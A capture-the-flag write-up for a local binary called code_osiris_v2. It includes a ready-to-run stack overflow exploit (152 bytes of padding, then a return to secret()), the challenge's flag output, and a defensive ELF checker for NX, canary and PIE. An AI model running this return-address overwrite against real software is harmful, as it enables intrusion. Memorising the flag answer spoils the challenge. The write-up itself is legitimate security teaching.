Code Osiris – TOKEN2

Target: local code_osiris_v2

Background

vulnerable_function in code_osiris_v2 reads an oversized argument and lets us overwrite RIP. Redirecting it to secret() at 0x401397 reveals the token; the offset to RIP is 152 bytes.

From Nothing to Working

  1. Confirm protections: NX off, no canary, no PIE (checksec).
  2. Locate secret() via nm/objdump (0x401397).
  3. Craft payload: 152 bytes of padding + secret() address (little-endian).
  4. Feed the payload as argv/stdin; secret() decrypts and prints the token.
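
Step 1 above relies on checksec; the script below is an added example (not part of these notes or of the challenge files) that reads the same three properties straight from an ELF64 image, which is how a build pipeline can audit its own output for a missing NX bit, stack canary or PIE before shipping. It assumes the usual checksec heuristics: NX from the PT_GNU_STACK segment flags, PIE from e_type == ET_DYN, and canary from the presence of the __stack_chk_fail symbol name. The sample images are constructed in-line so the script runs offline; pass a real binary path as argv[1] to inspect one on disk.

```python
#!/usr/bin/env python3
# elf_protections.py (added example): report NX / canary / PIE for an ELF64 file.
import struct
import sys
from typing import Optional

ELF_MAGIC = b"\x7fELF"
ELFCLASS64 = 2
ET_EXEC, ET_DYN = 2, 3
PT_GNU_STACK = 0x6474E551       # program header that carries the stack permissions
PF_X, PF_W, PF_R = 0x1, 0x2, 0x4

EHDR_FMT = "<16sHHIQQQIHHHHHH"   # 64-byte ELF64 header, little-endian
PHDR_FMT = "<IIQQQQQQ"           # 56-byte ELF64 program header


def parse_elf64(data: bytes) -> dict:
    """Return e_type and the (p_type, p_flags) pairs of every program header."""
    if data[:4] != ELF_MAGIC or data[4] != ELFCLASS64:
        raise ValueError("not an ELF64 image")
    (_, e_type, _, _, _, e_phoff, _, _, _,
     e_phentsize, e_phnum, _, _, _) = struct.unpack_from(EHDR_FMT, data, 0)
    phdrs = []
    for i in range(e_phnum):
        p_type, p_flags = struct.unpack_from("<II", data, e_phoff + i * e_phentsize)
        phdrs.append((p_type, p_flags))
    return {"e_type": e_type, "phdrs": phdrs}


def check_protections(data: bytes) -> dict:
    """NX, canary and PIE verdicts using the same heuristics checksec applies."""
    info = parse_elf64(data)
    stack_flags = [f for (t, f) in info["phdrs"] if t == PT_GNU_STACK]
    # No PT_GNU_STACK at all means the loader may grant an executable stack: treat as NX off.
    nx = bool(stack_flags) and not (stack_flags[0] & PF_X)
    pie = info["e_type"] == ET_DYN            # ET_DYN executables are position independent
    canary = b"__stack_chk_fail" in data      # symbol only appears if -fstack-protector was used
    return {"nx": nx, "canary": canary, "pie": pie}


def build_sample_elf(e_type: int, stack_flags: Optional[int], canary_symbol: bool) -> bytes:
    """Constructed, non-loadable ELF64 fixture with just enough structure for the checks."""
    phdrs, count = b"", 0
    if stack_flags is not None:
        phdrs = struct.pack(PHDR_FMT, PT_GNU_STACK, stack_flags, 0, 0, 0, 0, 0, 16)
        count = 1
    ident = ELF_MAGIC + bytes([ELFCLASS64, 1, 1]) + b"\x00" * 9
    ehdr = struct.pack(EHDR_FMT, ident, e_type, 0x3E, 1, 0x401000, 64, 0, 0,
                       64, 56, count, 64, 0, 0)
    tail = b"__stack_chk_fail\x00" if canary_symbol else b""
    return ehdr + phdrs + tail


def report(data: bytes) -> str:
    """Human-readable one-liner, e.g. for a CI log."""
    p = check_protections(data)
    return "NX: %s  Canary: %s  PIE: %s" % tuple(
        "enabled" if p[k] else "DISABLED" for k in ("nx", "canary", "pie"))


if __name__ == "__main__":
    if len(sys.argv) > 1:
        with open(sys.argv[1], "rb") as fh:
            print(report(fh.read()))
    else:
        # Constructed fixtures: a weak build like the challenge target, and a hardened one.
        print("weak:", report(build_sample_elf(ET_EXEC, PF_R | PF_W | PF_X, False)))
        print("hard:", report(build_sample_elf(ET_DYN, PF_R | PF_W, True)))
```

A build that reports any "DISABLED" field is the condition under which the overwrite described in Background becomes a straight return-address redirect; the fix on the defending side is the compiler and linker flags that turn the three on (-fstack-protector-strong, -Wl,-z,noexecstack, -fPIE -pie), which this check confirms after linking.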

Command

Save and run as python3 token2_exploit.py beside code_osiris_v2.

#!/usr/bin/env python3
# token2_exploit.py
import struct, subprocess

BINARY = "./code_osiris_v2"
OFFSET = 152          # bytes from the start of the buffer to the saved RIP
SECRET = 0x401397     # address of secret(), from nm/objdump

# padding up to the saved return address, then secret() as a little-endian 8-byte pointer
payload = b"A"*OFFSET + struct.pack("<Q", SECRET)
proc = subprocess.run([BINARY], input=payload, capture_output=True, timeout=3)
print(proc.stdout.decode(errors="ignore") + proc.stderr.decode(errors="ignore"))

Expected Output

TOKEN2: PCCC{PuJN-0294}